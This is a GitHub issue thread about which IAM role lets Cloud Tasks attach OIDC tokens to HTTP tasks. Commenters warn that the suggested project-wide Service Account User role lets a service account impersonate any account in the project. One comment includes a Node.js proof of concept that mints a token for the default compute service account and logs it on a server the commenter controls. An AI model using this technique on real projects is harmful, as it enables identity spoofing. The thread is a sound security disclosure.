### ISSUE TITLE
What role needs to be granted to the service account email which is used for oidcToken.serviceAccountEmail for httpTarget Task with authentication

### ISSUE THREAD

**Issue by SaugataDutta** [googleapis/nodejs-tasks#249]
I am trying create a httpTask with authentication, but it keeps failing with the below error.

> const task = {
>     //taskName,
>     httpRequest: {
>       httpMethod: "POST",
>       url: "https://host-test.org.com/task",
>       headers: {
>         traceHeaders: logTrace
>       },
>       oidcToken: {
>         serviceAccountEmail: "test-service@test.iam.gserviceaccount.com"
>       }
>     }
>   };

**Error Message**
`Failed to create task:  {"code":7,"details":"The principal (user or service account) lacks IAM permission \"iam.serviceAccounts.actAs\" for the resource \"test-service@test.iam.gserviceaccount.com\" (or the resource may not exist).","metadata":{"internalRepr":{}}}`

Currently below roles are granted to this service account.

1. Stackdriver Debugger Agent
2. Cloud Tasks Admin
3. Cloud Tasks Service Agent
4. Pub/Sub Editor

Can anyone please help me with what Role needs to be given to the service account to be able to generate the oidcToken?

**Comment by neilstuartcraig** [comment]
Hi @SaugataDutta - did you find a solution for this? I have hit the same problem.

**Comment by SaugataDutta** [comment]
Its the `Service Account User` i.e `roles/iam.serviceAccountUser` role which finally worked for me to generate HTTP task with OIDC token..

**Comment by ndeitch** [comment]
Hi, how it's supposed to work with cross project?

I need `cloud tasks` to invoke a cloud function in another project.

I tried to:

1 - Create a service account
2 - Attach this account on cloud function:
```bash
gcloud projects add-iam-policy-binding user-staging \
  --member="serviceAccount:cloud-task-enqueuer@events-staging.iam.gserviceaccount.com" \
  --role='roles/cloudfunctions.invoker'
```
But it's not working.

When I try to use cloud tasks service account on `oidcToken.serviceAccountEmail` it gives me:
`Failed to create task: {"code":7,"details":"The principal (user or service account) lacks IAM permission \"iam.serviceAccounts.actAs\" for the resource \"test-service@test.iam.gserviceaccount.com\" (or the resource may not exist).","metadata":{"internalRepr":{}}}`

**Comment by kostacasa** [comment]
> Its the `Service Account User` i.e `roles/iam.serviceAccountUser` role which finally worked for me to generate HTTP task with OIDC token..

This is true but I don't like it. From what I understand, this role allows the user to become any service account theoretically? Or the default compute account?

Let's assume we are creating a task from cloud run managed instance that runs under a `cloud-run-svc` service account. We want to create a cloud task that will call back to the same cloud run service with the same `cloud-run-svc` service account. I would expect that this would either:
* work out of the box (because cloud-run-svc can act as cloud-run-svc)
* I would need to allow the cloud tasks default account to act as `cloud-run-svc`

With this solution it's neither. It turns out that I need to allow `cloud-run-svc` to become any service account, which I don't want.

**Comment by ledmonster** [comment]
I also got following error when I tried to enqueue from Cloud Function (go 1.13)

```
The principal (user or service account) lacks IAM permission "iam.serviceAccounts.actAs" for the resource "xxxxx@xxx.iam.gserviceaccount.com" (or the resource may not exist).
```

but I resolved the issue by following command.

```
gcloud projects add-iam-policy-binding ${ProjectID} --member serviceAccount:${ServiceAccount} --role=roles/iam.serviceAccountUser
```

**Comment by mapad-oprate** [comment]
> Its the `Service Account User` i.e `roles/iam.serviceAccountUser` role which finally worked for me to generate HTTP task with OIDC token..

I could not find a better way. But by doing this be aware that if you have a default service account with editor role, your service account can now be editor. Sad...

**Comment by dpkirchner** [comment]
@saugatadutta Did you mean to close this immediately after creating it? I'm not sure it got the attention it needed, and the suggestion to use `roles/iam.serviceAccountUser` opens a *huge* security hole as @mapad-oprate pointed out.

**Comment by dpkirchner** [comment]
tl;dr: The global "Service Account User" role suggested here and on Google's docs doesn't seem to provide access to resources, it "only" allows Tasks to assert that callbacks can come from *any* service account inside your project, including the default compute engine service account. This means you shouldn't *entirely* trust the oidc token you get but it seems that you can be sure it was at least generated from any one of the service accounts within your project. Please, anyone at Google, correct me if I'm wrong.

---

I may be wrong about the size of the security hole. After digging around a lot (and trying various requests) as far as I can tell you can abuse this permission to create signed oidc tokens on behalf of any service account in your project, including `$PROJECT_ID-compute@developer.gserviceaccount.com`. But the only thing those tokens seem to allow you to do is assert your identity. That's really bad, of course, but it's not as critical as I'd first feared.

PoC:

Command-line script to inject a task, run this in an environment where you're authenticated as a service account (I used a k8s pod w/ a GCP SA bound to its k8s SA with Workload Identity).

```javascript
const { CloudTasksClient } = require('@google-cloud/tasks');

// Fill in the blank: Your GCT queue name
const QUEUE_NAME = '...';

// Fill in the blank: Your project's numeric id
const PROJECT_ID = '...';

// Fill in the blank: Some URL on a server you operate that can accept HTTP POSTs (see the next file in this GH comment)
const TASK_URL = '...';

const main = async () => {
	const body = { x: 1, };

	const task = {
		httpRequest: {
			body: Buffer.from(JSON.stringify(body)).toString('base64'),
			headers: {'content-type': 'application/json'},
			httpMethod: 'POST',
			oidcToken: {
				audience: 'whatever',
				serviceAccountEmail: `${PROJECT_ID}-compute@developer.gserviceaccount.com`,
			},
			url: TASK_URL,
		},
	};

	const request = {
		parent: `${QUEUE_NAME}`,
		task,
	};

	const cloudTasksClient = new CloudTasksClient();

	const [response] = await cloudTasksClient.createTask(request);

	console.log(JSON.stringify(response, null, 2));
};

main();
```

Express route to accept the POST from Tasks:

```javascript
const express = require('express');
const router = module.exports = express.Router();

router.post(
	'/',
	async (req, res) => {
		const client = new OAuth2Client();
		const authorization = req.header('authorization');

		const idToken = authorization.replace(/Bearer /u, '');

		console.log(idToken);

		try {
			await client.verifyIdToken({
				audience: 'whatever',
				idToken,
			});

			console.log('verified');
		} catch (err) {
			console.error(err);
		}

		res.status(200).send();
	}
);
```

`idToken` is three strings joined by `.`s that contain two base64 encoded JSON objects and a signing key. The second object is a JWT, looks like:

`{"aud":"whatever","azp":"123","email":"$PROJECT_ID-compute@developer.gserviceaccount.com","email_verified":true,"exp":1633117228,"iat":1633113628,"iss":"https://accounts.google.com","sub":"456"}`

and that's what you'd typically use to verify the source of a request.
